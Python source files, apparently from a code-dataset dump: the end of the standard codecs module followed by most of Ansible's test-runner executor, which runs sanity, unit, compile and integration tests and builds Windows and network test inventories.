xmlcharrefreplace_errors = lookup_error("xmlcharrefreplace")
backslashreplace_errors = lookup_error("backslashreplace")
except LookupError:
# In --disable-unicode builds, these error handler are missing
strict_errors = None
ignore_errors = None
replace_errors = None
xmlcharrefreplace_errors = None
backslashreplace_errors = None
# Tell modulefinder that using codecs probably needs the encodings
# package
_false = 0
if _false:
import encodings
### Tests
if __name__ == '__main__':
# Make stdout translate Latin-1 output into UTF-8 output
sys.stdout = EncodedFile(sys.stdout, 'latin-1', 'utf-8')
# Have stdin translate Latin-1 input into UTF-8 input
sys.stdin = EncodedFile(sys.stdin, 'utf-8', 'latin-1')
| mit |
jcftang/ansible | test/runner/lib/executor.py | 7 | 43544 | """Execute Ansible tests."""
from __future__ import absolute_import, print_function
import glob
import os
import tempfile
import time
import textwrap
import functools
import shutil
import stat
import random
import pipes
import string
import atexit
import re
import lib.pytar
import lib.thread
from lib.core_ci import (
AnsibleCoreCI,
SshKey,
)
from lib.manage_ci import (
ManageWindowsCI,
ManageNetworkCI,
)
from lib.util import (
CommonConfig,
EnvironmentConfig,
ApplicationWarning,
ApplicationError,
SubprocessError,
display,
run_command,
deepest_path,
common_environment,
remove_tree,
make_dirs,
is_shippable,
)
from lib.ansible_util import (
ansible_environment,
)
from lib.target import (
IntegrationTarget,
walk_external_targets,
walk_internal_targets,
walk_posix_integration_targets,
walk_network_integration_targets,
walk_windows_integration_targets,
walk_units_targets,
walk_compile_targets,
walk_sanity_targets,
)
from lib.changes import (
ShippableChanges,
LocalChanges,
)
from lib.git import (
Git,
)
from lib.classification import (
categorize_changes,
)
SUPPORTED_PYTHON_VERSIONS = (
'2.6',
'2.7',
'3.5',
'3.6',
)
COMPILE_PYTHON_VERSIONS = tuple(sorted(SUPPORTED_PYTHON_VERSIONS + ('2.4',)))
coverage_path = '' # pylint: disable=locally-disabled, invalid-name
def check_startup():
"""Checks to perform at startup before running commands."""
check_legacy_modules()
def check_legacy_modules():
"""Detect conflicts with legacy core/extras module directories to avoid problems later."""
for directory in 'core', 'extras':
path = 'lib/ansible/modules/%s' % directory
for root, _, file_names in os.walk(path):
if file_names:
# the directory shouldn't exist, but if it does, it must contain no files
raise ApplicationError('Files prohibited in "%s". '
'These are most likely legacy modules from version 2.2 or earlier.' % root)
def create_shell_command(command):
"""
:type command: list[str]
:rtype: list[str]
"""
optional_vars = (
'TERM',
)
cmd = ['/usr/bin/env']
cmd += ['%s=%s' % (var, os.environ[var]) for var in optional_vars if var in os.environ]
cmd += command
return cmd
def install_command_requirements(args):
"""
:type args: EnvironmentConfig
"""
generate_egg_info(args)
if not args.requirements:
return
cmd = generate_pip_install(args.command)
if not cmd:
return
if isinstance(args, TestConfig):
if args.coverage:
cmd += ['coverage']
try:
run_command(args, cmd)
except SubprocessError as ex:
if ex.status != 2:
raise
# If pip is too old it won't understand the arguments we passed in, so we'll need to upgrade it.
# Installing "coverage" on ubuntu 16.04 fails with the error:
# AttributeError: 'Requirement' object has no attribute 'project_name'
# See: https://bugs.launchpad.net/ubuntu/xenial/+source/python-pip/+bug/1626258
# Upgrading pip works around the issue.
run_command(args, ['pip', 'install', '--upgrade', 'pip'])
run_command(args, cmd)
def generate_egg_info(args):
"""
:type args: EnvironmentConfig
"""
if os.path.isdir('lib/ansible.egg-info'):
return
run_command(args, ['python', 'setup.py', 'egg_info'], capture=args.verbosity < 3)
def generate_pip_install(command):
"""
:type command: str
:return: list[str] | None
"""
constraints = 'test/runner/requirements/constraints.txt'
requirements = 'test/runner/requirements/%s.txt' % command
if not os.path.exists(requirements) or not os.path.getsize(requirements):
return None
return ['pip', 'install', '--disable-pip-version-check', '-r', requirements, '-c', constraints]
def command_shell(args):
"""
:type args: ShellConfig
"""
if args.delegate:
raise Delegate()
install_command_requirements(args)
cmd = create_shell_command(['bash', '-i'])
run_command(args, cmd)
def command_posix_integration(args):
"""
:type args: PosixIntegrationConfig
"""
internal_targets = command_integration_filter(args, walk_posix_integration_targets())
command_integration_filtered(args, internal_targets)
def command_network_integration(args):
"""
:type args: NetworkIntegrationConfig
"""
internal_targets = command_integration_filter(args, walk_network_integration_targets())
platform_targets = set(a for t in internal_targets for a in t.aliases if a.startswith('network/'))
if args.platform:
instances = [] # type: list [lib.thread.WrappedThread]
# generate an ssh key (if needed) up front once, instead of for each instance
SshKey(args)
for platform_version in args.platform:
platform, version = platform_version.split('/', 1)
platform_target = 'network/%s/' % platform
if platform_target not in platform_targets and 'network/basics/' not in platform_targets:
display.warning('Skipping "%s" because selected tests do not target the "%s" platform.' % (
platform_version, platform))
continue
instance = lib.thread.WrappedThread(functools.partial(network_run, args, platform, version))
instance.daemon = True
instance.start()
instances.append(instance)
install_command_requirements(args)
while any(instance.is_alive() for instance in instances):
time.sleep(1)
remotes = [instance.wait_for_result() for instance in instances]
inventory = network_inventory(remotes)
filename = 'test/integration/inventory.networking'
display.info('>>> Inventory: %s\n%s' % (filename, inventory.strip()), verbosity=3)
if not args.explain:
with open(filename, 'w') as inventory_fd:
inventory_fd.write(inventory)
else:
install_command_requirements(args)
command_integration_filtered(args, internal_targets)
def network_run(args, platform, version):
"""
:type args: NetworkIntegrationConfig
:type platform: str
:type version: str
:rtype: AnsibleCoreCI
"""
core_ci = AnsibleCoreCI(args, platform, version, stage=args.remote_stage)
core_ci.start()
core_ci.wait()
manage = ManageNetworkCI(core_ci)
manage.wait()
return core_ci
def network_inventory(remotes):
"""
:type remotes: list[AnsibleCoreCI]
:rtype: str
"""
groups = dict([(remote.platform, []) for remote in remotes])
for remote in remotes:
options = dict(
ansible_host=remote.connection.hostname,
ansible_user=remote.connection.username,
ansible_connection='network_cli',
ansible_ssh_private_key_file=remote.ssh_key.key,
ansible_network_os=remote.platform,
)
groups[remote.platform].append(
'%s %s' % (
remote.name.replace('.', '_'),
' '.join('%s="%s"' % (k, options[k]) for k in sorted(options)),
)
)
template = ''
for group in groups:
hosts = '\n'.join(groups[group])
template += textwrap.dedent("""
[%s]
%s
""") % (group, hosts)
inventory = template
return inventory
def command_windows_integration(args):
"""
:type args: WindowsIntegrationConfig
"""
internal_targets = command_integration_filter(args, walk_windows_integration_targets())
if args.windows:
instances = [] # type: list [lib.thread.WrappedThread]
for version in args.windows:
instance = lib.thread.WrappedThread(functools.partial(windows_run, args, version))
instance.daemon = True
instance.start()
instances.append(instance)
install_command_requirements(args)
while any(instance.is_alive() for instance in instances):
time.sleep(1)
remotes = [instance.wait_for_result() for instance in instances]
inventory = windows_inventory(remotes)
filename = 'test/integration/inventory.winrm'
display.info('>>> Inventory: %s\n%s' % (filename, inventory.strip()), verbosity=3)
if not args.explain:
with open(filename, 'w') as inventory_fd:
inventory_fd.write(inventory)
else:
install_command_requirements(args)
try:
command_integration_filtered(args, internal_targets)
finally:
pass
def windows_run(args, version):
"""
:type args: WindowsIntegrationConfig
:type version: str
:rtype: AnsibleCoreCI
"""
core_ci = AnsibleCoreCI(args, 'windows', version, stage=args.remote_stage)
core_ci.start()
core_ci.wait()
manage = ManageWindowsCI(core_ci)
manage.wait()
return core_ci
def windows_inventory(remotes):
"""
:type remotes: list[AnsibleCoreCI]
:rtype: str
"""
hosts = []
for remote in remotes:
options = dict(
ansible_host=remote.connection.hostname,
ansible_user=remote.connection.username,
ansible_password=remote.connection.password,
ansible_port=remote.connection.port,
)
hosts.append(
'%s %s' % (
remote.name.replace('/', '_'),
' '.join('%s="%s"' % (k, options[k]) for k in sorted(options)),
)
)
template = """
[windows]
%s
[windows:vars]
ansible_connection=winrm
ansible_winrm_server_cert_validation=ignore
# support winrm connection tests (temporary solution, does not support testing enable/disable of pipelining)
[winrm:children]
windows
# support winrm binary module tests (temporary solution)
[testhost_binary_modules:children]
windows
"""
template = textwrap.dedent(template)
inventory = template % ('\n'.join(hosts))
return inventory
def command_integration_filter(args, targets):
"""
:type args: IntegrationConfig
:type targets: collections.Iterable[IntegrationTarget]
:rtype: tuple[IntegrationTarget]
"""
targets = tuple(targets)
changes = get_changes_filter(args)
require = (args.require or []) + changes
exclude = (args.exclude or [])
internal_targets = walk_internal_targets(targets, args.include, exclude, require)
environment_exclude = get_integration_filter(args, internal_targets)
if environment_exclude:
exclude += environment_exclude
internal_targets = walk_internal_targets(targets, args.include, exclude, require)
if not internal_targets:
raise AllTargetsSkipped()
if args.start_at and not any(t.name == args.start_at for t in internal_targets):
raise ApplicationError('Start at target matches nothing: %s' % args.start_at)
if args.delegate:
raise Delegate(require=changes, exclude=exclude)
install_command_requirements(args)
return internal_targets
def command_integration_filtered(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
"""
found = False
targets_iter = iter(targets)
test_dir = os.path.expanduser('~/ansible_testing')
if any('needs/ssh/' in target.aliases for target in targets):
max_tries = 20
display.info('SSH service required for tests. Checking to make sure we can connect.')
for i in range(1, max_tries + 1):
try:
run_command(args, ['ssh', '-o', 'BatchMode=yes', 'localhost', 'id'], capture=True)
display.info('SSH service responded.')
break
except SubprocessError as ex:
if i == max_tries:
raise ex
seconds = 3
display.warning('SSH service not responding. Waiting %d second(s) before checking again.' % seconds)
time.sleep(seconds)
start_at_task = args.start_at_task
for target in targets_iter:
if args.start_at and not found:
found = target.name == args.start_at
if not found:
continue
tries = 2 if args.retry_on_error else 1
verbosity = args.verbosity
try:
while tries:
tries -= 1
if not args.explain:
# create a fresh test directory for each test target
remove_tree(test_dir)
make_dirs(test_dir)
try:
if target.script_path:
command_integration_script(args, target)
else:
command_integration_role(args, target, start_at_task)
start_at_task = None
break
except SubprocessError:
if not tries:
raise
display.warning('Retrying test target "%s" with maximum verbosity.' % target.name)
display.verbosity = args.verbosity = 6
except:
display.notice('To resume at this test target, use the option: --start-at %s' % target.name)
next_target = next(targets_iter, None)
if next_target:
display.notice('To resume after this test target, use the option: --start-at %s' % next_target.name)
raise
finally:
display.verbosity = args.verbosity = verbosity
def integration_environment(args):
"""
:type args: IntegrationConfig
:rtype: dict[str, str]
"""
env = ansible_environment(args)
integration = dict(
JUNIT_OUTPUT_DIR=os.path.abspath('test/results/junit'),
ANSIBLE_CALLBACK_WHITELIST='junit',
)
env.update(integration)
return env
def command_integration_script(args, target):
"""
:type args: IntegrationConfig
:type target: IntegrationTarget
"""
display.info('Running %s integration test script' % target.name)
cmd = ['./%s' % os.path.basename(target.script_path)]
if args.verbosity:
cmd.append('-' + ('v' * args.verbosity))
env = integration_environment(args)
cwd = target.path
intercept_command(args, cmd, env=env, cwd=cwd)
def command_integration_role(args, target, start_at_task):
"""
:type args: IntegrationConfig
:type target: IntegrationTarget
:type start_at_task: str
"""
display.info('Running %s integration test role' % target.name)
vars_file = 'integration_config.yml'
if 'windows/' in target.aliases:
inventory = 'inventory.winrm'
hosts = 'windows'
gather_facts = False
elif 'network/' in target.aliases:
inventory = 'inventory.networking'
hosts = target.name[:target.name.find('_')]
gather_facts = False
if hosts == 'net':
hosts = 'all'
else:
inventory = 'inventory'
hosts = 'testhost'
gather_facts = True
playbook = '''
- hosts: %s
gather_facts: %s
roles:
- { role: %s }
''' % (hosts, gather_facts, target.name)
with tempfile.NamedTemporaryFile(dir='test/integration', prefix='%s-' % target.name, suffix='.yml') as pb_fd:
pb_fd.write(playbook.encode('utf-8'))
pb_fd.flush()
filename = os.path.basename(pb_fd.name)
display.info('>>> Playbook: %s\n%s' % (filename, playbook.strip()), verbosity=3)
cmd = ['ansible-playbook', filename, '-i', inventory, '-e', '@%s' % vars_file]
if start_at_task:
cmd += ['--start-at-task', start_at_task]
if args.verbosity:
cmd.append('-' + ('v' * args.verbosity))
env = integration_environment(args)
cwd = 'test/integration'
env['ANSIBLE_ROLES_PATH'] = os.path.abspath('test/integration/targets')
intercept_command(args, cmd, env=env, cwd=cwd)
def command_units(args):
"""
:type args: UnitsConfig
"""
changes = get_changes_filter(args)
require = (args.require or []) + changes
include, exclude = walk_external_targets(walk_units_targets(), args.include, args.exclude, require)
if not include:
raise AllTargetsSkipped()
if args.delegate:
raise Delegate(require=changes)
install_command_requirements(args)
version_commands = []
for version in SUPPORTED_PYTHON_VERSIONS:
# run all versions unless version given, in which case run only that version
if args.python and version != args.python:
continue
env = ansible_environment(args)
cmd = [
'pytest',
'-r', 'a',
'--color',
'yes' if args.color else 'no',
'--junit-xml',
'test/results/junit/python%s-units.xml' % version,
]
if args.collect_only:
cmd.append('--collect-only')
if args.verbosity:
cmd.append('-' + ('v' * args.verbosity))
if exclude:
cmd += ['--ignore=%s' % target.path for target in exclude]
cmd += [target.path for target in include]
version_commands.append((version, cmd, env))
for version, command, env in version_commands:
display.info('Unit test with Python %s' % version)
try:
intercept_command(args, command, env=env, python_version=version)
except SubprocessError as ex:
# pytest exits with status code 5 when all tests are skipped, which isn't an error for our use case
if ex.status != 5:
raise
def command_compile(args):
"""
:type args: CompileConfig
"""
changes = get_changes_filter(args)
require = (args.require or []) + changes
include, exclude = walk_external_targets(walk_compile_targets(), args.include, args.exclude, require)
if not include:
raise AllTargetsSkipped()
if args.delegate:
raise Delegate(require=changes)
install_command_requirements(args)
version_commands = []
for version in COMPILE_PYTHON_VERSIONS:
# run all versions unless version given, in which case run only that version
if args.python and version != args.python:
continue
# optional list of regex patterns to exclude from tests
skip_file = 'test/compile/python%s-skip.txt' % version
if os.path.exists(skip_file):
with open(skip_file, 'r') as skip_fd:
skip_paths = skip_fd.read().splitlines()
else:
skip_paths = []
# augment file exclusions
skip_paths += [e.path for e in exclude]
skip_paths.append('/.tox/')
skip_paths = sorted(skip_paths)
python = 'python%s' % version
cmd = [python, '-m', 'compileall', '-fq']
if skip_paths:
cmd += ['-x', '|'.join(skip_paths)]
cmd += [target.path if target.path == '.' else './%s' % target.path for target in include]
version_commands.append((version, cmd))
for version, command in version_commands:
display.info('Compile with Python %s' % version)
run_command(args, command)
def command_sanity(args):
"""
:type args: SanityConfig
"""
changes = get_changes_filter(args)
require = (args.require or []) + changes
targets = SanityTargets(args.include, args.exclude, require)
if not targets.include:
raise AllTargetsSkipped()
if args.delegate:
raise Delegate(require=changes)
install_command_requirements(args)
tests = SANITY_TESTS
if args.test:
tests = [t for t in tests if t.name in args.test]
if args.skip_test:
tests = [t for t in tests if t.name not in args.skip_test]
for test in tests:
if args.list_tests:
display.info(test.name)
continue
if test.intercept:
versions = SUPPORTED_PYTHON_VERSIONS
else:
versions = None,
for version in versions:
if args.python and version and version != args.python:
continue
display.info('Sanity check using %s%s' % (test.name, ' with Python %s' % version if version else ''))
if test.intercept:
test.func(args, targets, python_version=version)
else:
test.func(args, targets)
def command_sanity_code_smell(args, _):
"""
:type args: SanityConfig
:type _: SanityTargets
"""
with open('test/sanity/code-smell/skip.txt', 'r') as skip_fd:
skip_tests = skip_fd.read().splitlines()
tests = glob.glob('test/sanity/code-smell/*')
tests = sorted(p for p in tests
if os.access(p, os.X_OK)
and os.path.isfile(p)
and os.path.basename(p) not in skip_tests)
for test in tests:
display.info('Code smell check using %s' % os.path.basename(test))
run_command(args, [test])
def command_sanity_validate_modules(args, targets):
"""
:type args: SanityConfig
:type targets: SanityTargets
"""
env = ansible_environment(args)
paths = [deepest_path(i.path, 'lib/ansible/modules/') for i in targets.include_external]
paths = sorted(set(p for p in paths if p))
if not paths:
display.info('No tests applicable.', verbosity=1)
return
cmd = ['test/sanity/validate-modules/validate-modules'] + paths
with open('test/sanity/validate-modules/skip.txt', 'r') as skip_fd:
skip_paths = skip_fd.read().splitlines()
skip_paths += [e.path for e in targets.exclude_external]
if skip_paths:
cmd += ['--exclude', '^(%s)' % '|'.join(skip_paths)]
run_command(args, cmd, env=env)
def command_sanity_shellcheck(args, targets):
"""
:type args: SanityConfig
:type targets: SanityTargets
"""
with open('test/sanity/shellcheck/skip.txt', 'r') as skip_fd:
skip_paths = set(skip_fd.read().splitlines())
paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] == '.sh' and i.path not in skip_paths)
if not paths:
display.info('No tests applicable.', verbosity=1)
return
run_command(args, ['shellcheck'] + paths)
def command_sanity_pep8(args, targets):
"""
:type args: SanityConfig
:type targets: SanityTargets
"""
skip_path = 'test/sanity/pep8/skip.txt'
legacy_path = 'test/sanity/pep8/legacy-files.txt'
with open(skip_path, 'r') as skip_fd:
skip_paths = set(skip_fd.read().splitlines())
with open(legacy_path, 'r') as legacy_fd:
legacy_paths = set(legacy_fd.read().splitlines())
with open('test/sanity/pep8/legacy-ignore.txt', 'r') as ignore_fd:
legacy_ignore = set(ignore_fd.read().splitlines())
with open('test/sanity/pep8/current-ignore.txt', 'r') as ignore_fd:
current_ignore = sorted(ignore_fd.read().splitlines())
paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] == '.py' and i.path not in skip_paths)
if not paths:
display.info('No tests applicable.', verbosity=1)
return
cmd = [
'pep8',
'--max-line-length', '160',
'--config', '/dev/null',
'--ignore', ','.join(sorted(current_ignore)),
] + paths
try:
stdout, stderr = run_command(args, cmd, capture=True)
status = 0
except SubprocessError as ex:
stdout = ex.stdout
stderr = ex.stderr
status = ex.status
if stderr:
raise SubprocessError(cmd=cmd, status=status, stderr=stderr)
pattern = '^(?P<path>[^:]*):(?P<line>[0-9]+):(?P<column>[0-9]+): (?P<code>[A-Z0-9]{4}) (?P<message>.*)$'
results = [re.search(pattern, line).groupdict() for line in stdout.splitlines()]
for result in results:
for key in 'line', 'column':
result[key] = int(result[key])
failed_result_paths = set([result['path'] for result in results])
passed_legacy_paths = set([path for path in paths if path in legacy_paths and path not in failed_result_paths])
errors = []
summary = {}
for path in sorted(passed_legacy_paths):
# Keep files out of the list which no longer require the relaxed rule set.
errors.append('PEP 8: %s: Passes current rule set. Remove from legacy list (%s).' % (path, legacy_path))
for path in sorted(skip_paths):
if not os.path.exists(path):
# Keep files out of the list which no longer exist in the repo.
errors.append('PEP 8: %s: Does not exist. Remove from skip list (%s).' % (path, skip_path))
for path in sorted(legacy_paths):
if not os.path.exists(path):
# Keep files out of the list which no longer exist in the repo.
errors.append('PEP 8: %s: Does not exist. Remove from legacy list (%s).' % (path, legacy_path))
for result in results:
path = result['path']
line = result['line']
column = result['column']
code = result['code']
message = result['message']
msg = 'PEP 8: %s:%s:%s: %s %s' % (path, line, column, code, message)
if path in legacy_paths:
msg += ' (legacy)'
else:
msg += ' (current)'
if path in legacy_paths and code in legacy_ignore:
# Files on the legacy list are permitted to have errors on the legacy ignore list.
# However, we want to report on their existence to track progress towards eliminating these exceptions.
display.info(msg, verbosity=3)
key = '%s %s' % (code, re.sub('[0-9]+', 'NNN', message))
if key not in summary:
summary[key] = 0
summary[key] += 1
else:
# Files not on the legacy list and errors not on the legacy ignore list are PEP 8 policy errors.
errors.append(msg)
for error in errors:
display.error(error)
if summary:
lines = []
count = 0
for key in sorted(summary):
count += summary[key]
lines.append('PEP 8: %5d %s' % (summary[key], key))
display.info('PEP 8: There were %d different legacy issues found (%d total):' %
(len(summary), count), verbosity=1)
display.info('PEP 8: Count Code Message', verbosity=1)
for line in lines:
display.info(line, verbosity=1)
if errors:
raise ApplicationError('PEP 8: There are %d issues which need to be resolved.' % len(errors))
def command_sanity_yamllint(args, targets):
"""
:type args: SanityConfig
:type targets: SanityTargets
"""
paths = sorted(i.path for i in targets.include if os.path.splitext(i.path)[1] in ('.yml', '.yaml'))
if not paths:
display.info('No tests applicable.', verbosity=1)
return
run_command(args, ['yamllint'] + paths)
def command_sanity_ansible_doc(args, targets, python_version):
"""
:type args: SanityConfig
:type targets: SanityTargets
:type python_version: str
"""
with open('test/sanity/ansible-doc/skip.txt', 'r') as skip_fd:
skip_modules = set(skip_fd.read().splitlines())
modules = sorted(set(m for i in targets.include_external for m in i.modules) -
set(m for i in targets.exclude_external for m in i.modules) -
skip_modules)
if not modules:
display.info('No tests applicable.', verbosity=1)
return
env = ansible_environment(args)
cmd = ['ansible-doc'] + modules
stdout, stderr = intercept_command(args, cmd, env=env, capture=True, python_version=python_version)
if stderr:
display.error('Output on stderr from ansible-doc is considered an error.')
raise SubprocessError(cmd, stderr=stderr)
if stdout:
display.info(stdout.strip(), verbosity=3)
def intercept_command(args, cmd, capture=False, env=None, data=None, cwd=None, python_version=None):
"""
:type args: TestConfig
:type cmd: collections.Iterable[str]
:type capture: bool
:type env: dict[str, str] | None
:type data: str | None
:type cwd: str | None
:type python_version: str | None
:rtype: str | None, str | None
"""
if not env:
env = common_environment()
cmd = list(cmd)
escaped_cmd = ' '.join(pipes.quote(c) for c in cmd)
inject_path = get_coverage_path(args)
env['PATH'] = inject_path + os.pathsep + env['PATH']
env['ANSIBLE_TEST_COVERAGE'] = 'coverage' if args.coverage else 'version'
env['ANSIBLE_TEST_PYTHON_VERSION'] = python_version or args.python_version
env['ANSIBLE_TEST_CMD'] = escaped_cmd
return run_command(args, cmd, capture=capture, env=env, data=data, cwd=cwd)
def get_coverage_path(args):
"""
:type args: TestConfig
:rtype: str
"""
global coverage_path # pylint: disable=locally-disabled, global-statement, invalid-name
if coverage_path:
return os.path.join(coverage_path, 'coverage')
prefix = 'ansible-test-coverage-'
tmp_dir = '/tmp'
if args.explain:
return os.path.join(tmp_dir, '%stmp' % prefix, 'coverage')
src = os.path.abspath(os.path.join(os.getcwd(), 'test/runner/injector/'))
coverage_path = tempfile.mkdtemp('', prefix, dir=tmp_dir)
os.chmod(coverage_path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
shutil.copytree(src, os.path.join(coverage_path, 'coverage'))
shutil.copy('.coveragerc', os.path.join(coverage_path, 'coverage', '.coveragerc'))
for directory in 'output', 'logs':
os.mkdir(os.path.join(coverage_path, directory))
os.chmod(os.path.join(coverage_path, directory), stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
atexit.register(cleanup_coverage_dir)
return os.path.join(coverage_path, 'coverage')
def cleanup_coverage_dir():
"""Copy over coverage data from temporary directory and purge temporary directory."""
output_dir = os.path.join(coverage_path, 'output')
for filename in os.listdir(output_dir):
src = os.path.join(output_dir, filename)
dst = os.path.join(os.getcwd(), 'test', 'results', 'coverage')
shutil.copy(src, dst)
logs_dir = os.path.join(coverage_path, 'logs')
for filename in os.listdir(logs_dir):
random_suffix = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
new_name = '%s.%s.log' % (os.path.splitext(os.path.basename(filename))[0], random_suffix)
src = os.path.join(logs_dir, filename)
dst = os.path.join(os.getcwd(), 'test', 'results', 'logs', new_name)
shutil.copy(src, dst)
shutil.rmtree(coverage_path)
def get_changes_filter(args):
"""
:type args: TestConfig
:rtype: list[str]
"""
paths = detect_changes(args)
if paths is None:
return [] # change detection not enabled, do not filter targets
if not paths:
raise NoChangesDetected()
commands = categorize_changes(paths, args.command)
targets = commands.get(args.command)
if targets is None:
raise NoTestsForChanges()
if targets == ['all']:
return [] # changes require testing all targets, do not filter targets
return targets
def detect_changes(args):
"""
:type args: TestConfig
:rtype: list[str] | None
"""
if is_shippable():
display.info('Shippable detected, collecting parameters from environment.')
paths = detect_changes_shippable(args)
elif args.changed_from or args.changed_path:
paths = args.changed_path or []
if args.changed_from:
with open(args.changed_from, 'r') as changes_fd:
paths += changes_fd.read().splitlines()
elif args.changed:
paths = detect_changes_local(args)
else:
return None # change detection not enabled
display.info('Detected changes in %d file(s).' % len(paths))
for path in paths:
display.info(path, verbosity=1)
return paths
def detect_changes_shippable(args):
"""Initialize change detection on Shippable.
:type args: CommonConfig
:rtype: list[str]
"""
git = Git(args)
result = ShippableChanges(args, git)
if result.is_pr:
job_type = 'pull request'
elif result.is_tag:
job_type = 'tag'
else:
job_type = 'merge commit'
display.info('Processing %s for branch %s commit %s' % (job_type, result.branch, result.commit))
return result.paths
def detect_changes_local(args):
"""
:type args: TestConfig
:rtype: list[str]
"""
git = Git(args)
result = LocalChanges(args, git)
display.info('Detected branch %s forked from %s at commit %s' % (
result.current_branch, result.fork_branch, result.fork_point))
if result.untracked and not args.untracked:
display.warning('Ignored %s untracked file(s). Use --untracked to include them.' %
len(result.untracked))
if result.committed and not args.committed:
display.warning('Ignored %s committed change(s). Omit --ignore-committed to include them.' %
len(result.committed))
if result.staged and not args.staged:
display.warning('Ignored %s staged change(s). Omit --ignore-staged to include them.' %
len(result.staged))
if result.unstaged and not args.unstaged:
display.warning('Ignored %s unstaged change(s). Omit --ignore-unstaged to include them.' %
len(result.unstaged))
names = set()
if args.tracked:
names |= set(result.tracked)
if args.untracked:
names |= set(result.untracked)
if args.committed:
names |= set(result.committed)
if args.staged:
names |= set(result.staged)
if args.unstaged:
names |= set(result.unstaged)
return sorted(names)
def get_integration_filter(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
:rtype: list[str]
"""
if args.tox:
# tox has the same exclusions as the local environment
return get_integration_local_filter(args, targets)
if args.docker:
return get_integration_docker_filter(args, targets)
if args.remote:
return get_integration_remote_filter(args, targets)
return get_integration_local_filter(args, targets)
def get_integration_local_filter(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
:rtype: list[str]
"""
exclude = []
if os.getuid() != 0:
skip = 'needs/root/'
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which require running as root: %s'
% (skip.rstrip('/'), ', '.join(skipped)))
# consider explicit testing of destructive as though --allow-destructive was given
include_destructive = any(target.startswith('destructive/') for target in args.include)
if not args.allow_destructive and not include_destructive:
skip = 'destructive/'
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which require --allow-destructive to run locally: %s'
% (skip.rstrip('/'), ', '.join(skipped)))
return exclude
def get_integration_docker_filter(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
:rtype: list[str]
"""
exclude = []
if not args.docker_privileged:
skip = 'needs/privileged/'
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which require --docker-privileged to run under docker: %s'
% (skip.rstrip('/'), ', '.join(skipped)))
if args.docker.endswith('py3'):
skip = 'skip/python3/'
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which are not yet supported on python 3: %s'
% (skip.rstrip('/'), ', '.join(skipped)))
return exclude
def get_integration_remote_filter(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
:rtype: list[str]
"""
parts = args.remote.split('/', 1)
platform = parts[0]
exclude = []
skip = 'skip/%s/' % platform
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which are not yet supported on %s: %s'
% (skip.rstrip('/'), platform, ', '.join(skipped)))
return exclude
class NoChangesDetected(ApplicationWarning):
"""Exception when change detection was performed, but no changes were found."""
def __init__(self):
super(NoChangesDetected, self).__init__('No changes detected.')
class NoTestsForChanges(ApplicationWarning):
"""Exception when changes detected, but no tests trigger as a result."""
def __init__(self):
super(NoTestsForChanges, self).__init__('No tests found for detected changes.')
class SanityTargets(object):
"""Sanity test target information."""
def __init__(self, include, exclude, require):
"""
:type include: list[str]
:type exclude: list[str]
:type require: list[str]
"""
self.all = not include
self.targets = tuple(sorted(walk_sanity_targets()))
self.include = walk_internal_targets(self.targets, include, exclude, require)
self.include_external, self.exclude_external = walk_external_targets(self.targets, include, exclude, require)
class SanityTest(object):
"""Sanity test base class."""
def __init__(self, name):
self.name = name
class SanityFunc(SanityTest):
"""Sanity test function information."""
def __init__(self, name, func, intercept=True):
"""
:type name: str
:type func: (SanityConfig, SanityTargets) -> None
:type intercept: bool
"""
super(SanityFunc, self).__init__(name)
self.func = func
self.intercept = intercept
class TestConfig(EnvironmentConfig):
"""Configuration common to all test commands."""
def __init__(self, args, command):
"""
:type args: any
:type command: str
"""
super(TestConfig, self).__init__(args, command)
self.coverage = args.coverage # type: bool
self.include = args.include # type: list [str]
self.exclude = args.exclude # type: list [str]
self.require = args.require # type: list [str]
self.changed = args.changed # type: bool
self.tracked = args.tracked # type: bool
self.untracked = args.untracked # type: bool
self.committed = args.committed # type: bool
self.staged = args.staged # type: bool
self.unstaged = args.unstaged # type: bool
self.changed_from = args.changed_from # type: str
self.changed_path = args.changed_path # type: list [str]
class ShellConfig(EnvironmentConfig):
"""Configuration for the shell command."""
def __init__(self, args):
"""
:type args: any
"""
super(ShellConfig, self).__init__(args, 'shell')
class SanityConfig(TestConfig):
"""Configuration for the sanity command."""
def __init__(self, args):
"""
:type args: any
"""
super(SanityConfig, self).__init__(args, 'sanity')
self.test = args.test # type: list [str]
self.skip_test = args.skip_test # type: list [str]
self.list_tests = args.list_tests # type: bool
class IntegrationConfig(TestConfig):
"""Configuration for the integration command."""
def __init__(self, args, command):
"""
:type args: any
:type command: str
"""
super(IntegrationConfig, self).__init__(args, command)
self.start_at = args.start_at # type: str
self.start_at_task = args.start_at_task # type: str
self.allow_destructive = args.allow_destructive if 'allow_destructive' in args else False # type: bool
self.retry_on_error = args.retry_on_error # type: bool
class PosixIntegrationConfig(IntegrationConfig):
"""Configuration for the posix integration command."""
def __init__(self, args):
"""
:type args: any
"""
super(PosixIntegrationConfig, self).__init__(args, 'integration')
class WindowsIntegrationConfig(IntegrationConfig):
"""Configuration for the windows integration command."""
def __init__(self, args):
"""
:type args: any
"""
super(WindowsIntegrationConfig, self).__init__(args, 'windows-integration')
self.windows = args.windows # type: list [str]
class NetworkIntegrationConfig(IntegrationConfig):
"""Configuration for the network integration command."""
def __init__(self, args):
"""
:type args: any
"""
super(NetworkIntegrationConfig, self).__init__(args, 'network-integration')
self.platform = args.platform # type list [str]
class UnitsConfig(TestConfig):
"""Configuration for the units command."""
def __init__(self, args):
"""
:type args: any
"""
